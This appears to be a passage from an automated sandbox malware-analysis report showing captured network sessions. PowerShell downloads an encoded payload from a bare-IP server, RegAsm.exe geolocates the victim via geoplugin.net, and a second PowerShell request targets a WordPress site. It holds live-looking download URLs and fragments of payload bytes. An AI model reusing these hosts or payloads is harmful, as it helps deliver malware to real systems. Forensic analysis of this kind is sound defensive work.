                                                        Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
Jul 27, 2024 13:30:59.798913002 CEST | 1236 | IN | Data Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                                                        Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
Jul 27, 2024 13:30:59.798928022 CEST | 1236 | IN | Data Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                                                        Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
Jul 27, 2024 13:30:59.798964977 CEST | 1236 | IN | Data Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                                                        Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
Jul 27, 2024 13:30:59.799156904 CEST | 1236 | IN | Data Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                                                        Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
Jul 27, 2024 13:30:59.799171925 CEST | 1236 | IN | Data Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                                                        Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
Jul 27, 2024 13:30:59.799185991 CEST | 1236 | IN | Data Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                                                        Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
Jul 27, 2024 13:30:59.799300909 CEST | 1236 | IN | Data Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
                                                        Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
Jul 27, 2024 13:30:59.799315929 CEST | 1236 | IN | Data Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
                                                        Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
Jul 27, 2024 13:30:59.799330950 CEST | 1236 | IN | Data Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
                                                        Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
Jul 27, 2024 13:30:59.803849936 CEST | 1236 | IN | Data Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
                                                        Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 104.168.45.34 | 80 | 4432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Jul 27, 2024 13:31:01.665900946 CEST | 74 | OUT | GET /59/LMTS.txt HTTP/1.1
Host: 104.168.45.34
Connection: Keep-Alive
Jul 27, 2024 13:31:02.168703079 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Sat, 27 Jul 2024 11:31:02 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 26 Jul 2024 06:12:52 GMT
ETag: "a1000-61e2066c262fd"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
Jul 27, 2024 13:31:02.168751955 CEST | 1236 | IN | Data Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                                        Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
Jul 27, 2024 13:31:02.168787003 CEST | 1236 | IN | Data Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                                                        Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
Jul 27, 2024 13:31:02.168829918 CEST | 1236 | IN | Data Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                                                        Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
Jul 27, 2024 13:31:02.168941975 CEST | 896 | IN | Data Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44
                                                        Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
Jul 27, 2024 13:31:02.168975115 CEST | 1236 | IN | Data Raw: 59 44 48 32 67 68 4e 55 59 44 45 32 77 67 4e 49 55 44 2f 31 67 66 4e 30 58 44 38 31 77 65 4e 6f 58 44 35 31 41 65 4e 63 58 44 32 31 51 64 4e 51 58 44 7a 31 67 63 4e 45 58 44 77 31 77 62 4e 34 57 44 74 31 41 62 4e 73 57 44 71 31 51 61 4e 67 57 44
                                                        Data Ascii: YDH2ghNUYDE2wgNIUD/1gfN0XD81weNoXD51AeNcXD21QdNQXDz1gcNEXDw1wbN4WDt1AbNsWDq1QaNgWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEQD/AAQAwBQBQCQMsFjYxgVMOFDRxoTMwEjJxwRMSEDCw4PM0Dj6wAOMWDDz
Jul 27, 2024 13:31:02.169008017 CEST | 1236 | IN | Data Raw: 41 57 4e 4f 56 44 50 31 6f 53 4e 59 51 44 31 30 41 4d 4e 77 52 54 61 30 34 43 4e 59 4d 6a 35 7a 6f 39 4d 72 4f 6a 6e 7a 41 32 4d 2f 4d 54 4e 7a 49 69 4d 34 4c 7a 37 79 67 75 4d 6d 4b 7a 6e 79 55 6d 4d 50 4a 44 4f 79 45 6a 4d 49 49 44 41 78 4d 65
                                                        Data Ascii: AWNOVDP1oSNYQD10AMNwRTa04CNYMj5zo9MrOjnzA2M/MTNzIiM4Lz7yguMmKznyUmMPJDOyEjMIIDAxMeMVHjxxYYMsBAAAwHAFAAA/Q1Pm4T++cuPP7jx+kUPC2za94VPR1DR9MAP2zz78gOPhzDZ8kFP7wDF7I/OHvzk782OgtjV78kOypjH4gHOScDV3Y0NzczK30hNWbTy2UrNjazO1kdNgUDG1oAN5TD70EONhSDj0gHN
Jul 27, 2024 13:31:02.169040918 CEST | 1236 | IN | Data Raw: 50 54 38 7a 63 2b 4d 67 50 54 30 7a 73 38 4d 45 50 54 75 79 30 6a 4d 79 45 6a 30 78 6f 58 4d 30 46 6a 62 78 73 56 4d 4e 46 54 52 78 34 53 4d 6b 45 54 47 78 4d 52 4d 4f 41 54 36 77 41 4f 4d 38 43 44 74 77 55 48 4d 74 42 44 4c 77 45 43 41 41 41 41
                                                        Data Ascii: PT8zc+MgPT0zs8MEPTuy0jMyEj0xoXM0FjbxsVMNFTRx4SMkETGxMRMOAT6wAOM8CDtwUHMtBDLwECAAAAnAQAkAAAA/48PI/TY/k1PL9zQ/ozPx8TK/EyPZ8jD+wvP07D6+AuPX7jz+YsP+6jt+4qPh6Tl+0oPP5zI9cfPQ3jy9QcP+2jt9IbPn2Dm9wYP71zb90VP50jK9wBP6zT98APPczT08wLPvyDp8UHPXxjU80EPCxjJ
                                                        Jul 27, 2024 13:31:02.169074059 CEST1236INData Raw: 4d 49 4e 39 52 7a 64 30 30 47 4e 5a 51 54 42 7a 38 2f 4d 74 50 54 72 7a 49 35 4d 41 4f 7a 62 7a 59 32 4d 63 4e 44 56 7a 49 6b 4d 36 4c 54 38 79 38 74 4d 59 4c 6a 62 79 30 6c 4d 59 4a 44 54 79 63 6b 4d 30 49 44 4b 79 45 69 4d 4b 45 44 39 78 34 64
                                                        Data Ascii: MIN9Rzd00GNZQTBz8/MtPTrzI5MAOzbzY2McNDVzIkM6LT8y8tMYLjby0lMYJDTyckM0IDKyEiMKED9x4dMPHznxgWMSBjHAAAA0CABwAAAA8T7/I+PH/zo/c4P15zT+EjPT0jz8QOPXzzx8oLPCsjw7A7OjuDm7Q3OEtzN70hOyqjc48MO6aTv2wVNSXDi1MXNZQjxzkrMbLDuygYM3BAAAgFAEACA7MxNFfDq3YlNwXD21sBN
                                                        Jul 27, 2024 13:31:02.169109106 CEST1236INData Raw: 77 44 49 38 73 78 4f 57 76 44 67 37 77 33 4f 34 74 44 64 37 38 32 4f 6f 74 54 4d 35 4d 59 4f 31 6c 7a 56 35 51 6b 4e 73 61 44 71 32 51 71 4e 67 61 7a 6d 32 59 6c 4e 41 55 44 2f 31 67 66 4e 30 58 7a 37 31 67 65 4e 78 53 7a 41 7a 55 2f 4d 58 50 44
                                                        Data Ascii: wDI8sxOWvDg7w3O4tDd782OotTM5MYO1lzV5QkNsaDq2QqNgazm2YlNAUD/1gfN0Xz71geNxSzAzU/MXPDxzcgMELjvy4qMFKDXyYjMUIjDyAQM7HT9x8eMpHD5x4dMYHj0x0cMHHTwxsbM2GDsxoaMkGznxkZMTGTjxgYMCGDfxYXMxFzaxUWMfFjWxQVMOFDSxMUM9EzNxETMsEjJxASMaETFx8QMJEzAw4PM4Dj8wwOMnDT4
                                                        Jul 27, 2024 13:31:02.175251961 CEST1236INData Raw: 77 73 4d 47 4c 54 75 78 4d 65 4d 5a 48 7a 7a 78 55 63 4d 37 47 54 74 41 41 51 41 6b 41 77 41 41 42 67 50 4c 32 44 35 39 6b 45 50 6f 79 54 46 37 49 6f 4f 76 72 6a 58 34 4d 48 4f 68 68 7a 53 34 51 78 4e 32 66 7a 32 33 63 37 4e 67 65 7a 67 33 73 48
                                                        Data Ascii: wsMGLTuxMeMZHzzxUcM7GTtAAQAkAwAABgPL2D59kEPoyTF7IoOvrjX4MHOhhzS4QxN2fz23c7Ngezg3sHAAAALAMAMA4z7+otPF7TbzU6MWBAAAQBADACAyAoMwBAAAwAADABA+UpP/5Ta+wCAAAAEAMAAAAAAwwLMtCDnw4HMvBAAAQBACAPAAAwNofzx3U7NmeDgAAAAUAgAQDwMjOjdAAAAMAgAADwOysjJ7ggOjrDz6sWO


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.5 | 49709 | 178.237.33.50 | 80 | 5684 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Jul 27, 2024 13:31:05.460515022 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
                                                        Jul 27, 2024 13:31:06.094608068 CEST | 1170 | IN | HTTP/1.1 200 OK
                                                        date: Sat, 27 Jul 2024 11:31:05 GMT
                                                        server: Apache
                                                        content-length: 962
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        0 | 192.168.2.5 | 49711 | 93.113.54.56 | 443 | 7244 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-07-27 11:31:14 UTC | 189 | OUT | GET /os/transportment.pfm HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: asociatiatraditiimaria.ro
                                                        Connection: Keep-Alive
                                                        2024-07-27 11:31:17 UTC | 518 | IN | HTTP/1.1 404 Not Found
                                                        Connection: close
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                        transfer-encoding: chunked
                                                        date: Sat, 27 Jul 2024 11:31:16 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-07-27 11:31:17 UTC | 850 | IN | Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                        Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociația Tradiții
                                                        2024-07-27 11:31:17 UTC | 14994 | IN | Data Raw: 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 73 6f 63 69 61 74 69 61 74 72 61 64 69 74 69 69 6d 61 72 69 61 2e 72 6f 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54
